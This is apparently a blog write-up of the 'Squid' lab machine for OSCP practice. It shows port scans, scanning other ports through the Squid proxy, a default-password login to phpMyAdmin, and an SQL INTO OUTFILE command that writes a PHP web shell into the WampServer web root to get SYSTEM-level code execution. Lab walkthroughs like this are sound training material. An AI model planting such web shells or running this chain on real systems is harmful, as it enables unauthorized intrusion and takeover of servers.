Home Squid
Post
Cancel

Squid

Posted Oct 5, 2024
By KS
2 min read

Machine Information

  • Machine Name: Squid
  • Machine Difficulty: Easy

Information Gathering

Classic nmap time

1
2
3
4
5
6
7
8
9
10
11
12
13

Nmap scan report for 192.168.108.189
Host is up, received user-set (0.021s latency).
Scanned at 2024-10-05 21:22:02 +08 for 209s
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
3128/tcp  open  http-proxy    syn-ack ttl 125 Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

The only suspicious things here to look out for is actually port 3128

Port 3128

Port 3128 is actually proxy-squid. According to https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid, I could use the SPOUSE Scanner to check for other open ports.

1
2
3
4

python spose.py --proxy http://192.168.108.189:3128/ --target 192.168.108.189
Using proxy address http://192.168.108.189:3128/
192.168.108.189 3306 seems OPEN 
192.168.108.189 8080 seems OPEN

With that, I know that Port 8080 can be accessed using the proxy squid.

Port 8080

To access port 8080 using the proxy squid, I’m using an extension named “FoxyProxy” to set up the proxy. To set up on FoxyProxy, do the following:

Once the setup is ready, just click on the extension and change to squid.

Now I could access the port 8080 as usual.

After looking around, I noticed that there’s a path to phpmyadmin which is a webpage for accessing the database.

It seems like I could access it !! I then tried to use default password and manage to login into it.

Now that I have access to execute SQL command, I tried to write a vulnerable php command into a file using SQL command. Since this is a WampServer, the root directory should be C:\wamp\www

1

SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "C:\\wamp\\www\\test.php"

The SQL command successfully executed. Now I could just check by accessing the test.php.

Cool ~ Although I did not get reverse shell, I managed to perform RCE and get a NT Authority System shell.

Things I learned from this machine

  • proxy port should always be focused
  • write file in SQL could lead to RCE
PG
boot2root OSCP-Prep
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

Craft

Medjed